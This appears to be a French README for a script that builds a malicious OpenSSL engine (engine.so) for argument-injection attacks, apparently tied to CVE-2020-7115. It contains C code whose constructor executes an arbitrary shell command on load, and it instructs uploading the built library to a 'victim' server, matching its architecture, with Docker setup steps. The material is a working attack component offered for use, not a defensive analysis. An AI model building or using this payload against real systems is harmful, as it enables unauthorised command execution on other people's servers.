
Créez votre moteur malveillant en quelques secondes
Créez votre moteur malveillant en quelques secondes
Script simple pour générer un moteur malveillant prêt à être utilisé dans des scénarios d'injection d'arguments openssl.
C'est très simple, modifiez simplement le fichier engine.c avec la commande de votre choix :
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "COMMAND");
}
Une fois que vous avez fait cela, il vous suffit d'exécuter le script comme ceci :
bash build_engine.sh
Cette commande créera un dossier nommé output, dans lequel vous trouverez un fichier appelé engine.so qui est celui que vous devez envoyer au serveur via une fonctionnalité de téléchargement de fichier.
Il est important que vous sachiez que vous devez créer le moteur malveillant avec les mêmes caractéristiques que le système victime. C'est-à-dire... si le système cible fonctionne sur un linux 64 bits, vous devez créer le moteur malveillant sur un linux 64 bits.
Docker est une technologie fantastique pour ce genre de choses, et configurer votre environnement est très simple.
Tout d'abord, téléchargeons l'image docker depuis ce site pour un système linux debian 64 bits :
sudo docker pull debian
Ensuite, nous allons lancer le docker comme suit :
sudo docker run -v `pwd`:/code -it debian
Comprenons un peu ce que nous avons fait ici. L'option -v est utilisée pour créer un volume, dans ce cas nous associons le contenu du dossier /code au contenu de notre dossier actuel, d'où l'utilisation de pwd.
Par « associer », j'entends que tout ce que nous créons ou modifions dans /code (dossier hébergé à la racine de l'image docker), nous l'aurons et le verrons dans pwd et vice versa.
Dans notre cas, pwd pointe vers le répertoire suivant sur notre machine locale :
/home/retr0/CVE-2020-7115/
L'option -it, quant à elle, peut être vue comme suit :
L'option -t (--tty) dit à Docker de mapper une session de terminal virtuel à l'intérieur du conteneur. Ceci est couramment utilisé avec l'option -i (--interactive), qui maintient STDIN ouvert même en mode détaché.
Donc en pratique, utiliser l'option -it est utile lorsque nous voulons obtenir un shell du conteneur en question.
Pas de problème, il suffit de visiter cet article, et je suis sûr que vous comprendrez parfaitement cette vulnérabilité.